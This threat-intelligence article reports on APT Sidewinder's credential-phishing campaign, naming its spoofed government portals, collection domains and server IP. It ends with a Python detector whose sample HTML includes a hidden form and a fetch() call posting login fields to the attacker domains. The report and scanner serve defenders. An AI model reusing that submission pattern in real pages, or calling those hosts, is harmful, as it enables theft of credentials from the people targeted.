APT Sidewinder Spoofs Government and Military Institutions to Steal Login Credentials

APT Sidewinder, a persistent threat actor believed to originate from South Asia, has launched a sophisticated credential harvesting campaign targeting government and military entities across Bangladesh, Nepal, Turkey, and neighboring countries.

The group has demonstrated remarkable adaptability in its phishing techniques, creating convincing replicas of official login portals to steal authentication credentials from high-value targets.

The campaign primarily leverages spear-phishing attacks through weaponized documents and malicious links that mimic legitimate government communications.

Phishing Attack shared by Demon showing the Login page for ‘Government of Nepal’ (Source – Hunt.io)

By impersonating trusted institutions, the threat actors successfully trick victims into entering their credentials on fraudulent login pages designed to capture and exfiltrate authentication data to attacker-controlled servers.

Hunt.io analysts identified the operation after investigating a phishing attack targeting Nepal’s Ministry of Defense, which led to the discovery of a broader infrastructure spanning multiple countries and government agencies.

The investigation revealed over a dozen phishing domains, each carefully crafted to mimic different agencies including DGDP, DGFI, Bangladesh Police, and Turkish defense contractors like ASELSAN and ROKETSAN.

The attackers use free hosting services such as Netlify and Pages.dev to deploy phishing infrastructure rapidly, while keeping several credential collection endpoints in place for redundancy.

APT Sidewinder Attribution for ‘netlify[.]app’ from X post showing reuse of similar infrastructure (Source – Hunt.io)

This approach allows them to quickly establish new attack vectors when existing domains are detected and blocked.

Infrastructure Analysis and Credential Collection Methods

The technical analysis reveals APT Sidewinder’s systematic approach to credential harvesting through centralized collection infrastructure.

The group employs two primary credential exfiltration domains: mailbox3-inbox1-bd.com and mailbox-inbox-bd.com, both resolving to IP address 146.70.118.226 hosted by M247 Europe SRL in Frankfurt, Germany.

The phishing pages use hidden POST requests to transmit stolen credentials silently. For example, a fake Zimbra login page hosted at mail-mod-gov-np-account-file-data.netlify.app contains JavaScript that submits the entered username and password to https://mailbox3-inbox1-bd.com/3456.php through a concealed form submission.

The HTML source code maintains authentic titles like “Zimbra Web Client Sign In” to enhance credibility while executing malicious backend operations.

The campaign demonstrates infrastructure reuse across different targeting scenarios, with consistent backend scripts like /2135.php and /idef.php being deployed across multiple phishing kits.

This template-based approach indicates automated deployment capabilities, allowing the threat actors to rapidly scale their operations while maintaining operational continuity even when individual URLs are compromised or blocked.
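The pattern described above (a login page whose visible branding belongs to one organization while its form or script posts credentials to an unrelated domain) is straightforward to detect in saved page source. The following scanner is an added example written for this article; it is not code from Hunt.io or from the phishing kit. It uses only the Python standard library, and the sample HTML is constructed to mirror the structure the report describes: the page title, hosting subdomain, collection domains and PHP endpoint names are the values named in the article, while the markup around them is made up. The two-label "registered domain" helper is a deliberate simplification (an assumption) that is adequate for the .com and .app hosts involved here.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a Zimbra-branded login form on a netlify.app
# subdomain whose hidden form and script post to the collection domains
# named in the report. Markup is invented; hosts and paths come from the article.
SAMPLE_PAGE_URL = "https://mail-mod-gov-np-account-file-data.netlify.app/"
SAMPLE_HTML = """
<html><head><title>Zimbra Web Client Sign In</title></head>
<body>
<form id="login" action="https://mailbox3-inbox1-bd.com/3456.php" method="POST" style="display:none">
  <input name="username"><input name="password" type="password">
</form>
<form action="/login" method="post">
  <input name="username"><input name="password" type="password">
</form>
<script>
  fetch("https://mailbox-inbox-bd.com/2135.php", {method: "POST", body: data});
</script>
</body></html>
"""

URL_IN_JS = re.compile(r"""["'](https?://[^"'\s]+)["']""")


class LoginPageCollector(HTMLParser):
    """Collects the <title>, every <form action>, and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.title_parts, self.form_actions, self.scripts = [], [], []
        self._in_title = self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "script":
            self._in_script = True
        elif tag == "form":
            self.form_actions.append((a.get("action") or "", (a.get("method") or "get").lower()))

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_title:
            self.title_parts.append(data)
        elif self._in_script:
            self.scripts.append(data)


def registered_domain(host):
    # Assumption: last two labels approximate the registrable domain
    # (no public-suffix list); good enough for the .com/.app hosts in this report.
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def find_cross_origin_posts(page_url, html):
    """Return the page title and every absolute submission target whose
    registrable domain differs from the page's own (the exfiltration pattern)."""
    page_domain = registered_domain(urlparse(page_url).hostname or "")
    p = LoginPageCollector()
    p.feed(html)
    candidates = [(action, "form:" + method) for action, method in p.form_actions]
    for body in p.scripts:
        candidates += [(u, "script") for u in URL_IN_JS.findall(body)]
    findings = []
    for target, via in candidates:
        host = urlparse(target).hostname
        if not host:
            continue  # relative action: same origin, nothing to flag
        if registered_domain(host) != page_domain:
            findings.append({"target": target, "host": host, "via": via})
    title = "".join(p.title_parts).strip()
    return {
        "title": title,
        "page_domain": page_domain,
        "cross_origin_posts": findings,
        # A login-themed title plus off-domain credential submission is the kit signature.
        "suspicious": bool(findings) and "sign in" in title.lower(),
    }


if __name__ == "__main__":
    result = find_cross_origin_posts(SAMPLE_PAGE_URL, SAMPLE_HTML)
    for f in result["cross_origin_posts"]:
        print(f"[{f['via']}] {result['page_domain']} -> {f['host']} ({f['target']})")
```

Run against a saved copy of a suspected page, the output lists each off-domain submission target with how it was reached (a form action or a URL inside a script). The collected hosts are the pivot point for the infrastructure analysis above: resolving them and grouping by IP is how the two collection domains were tied to a single server.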
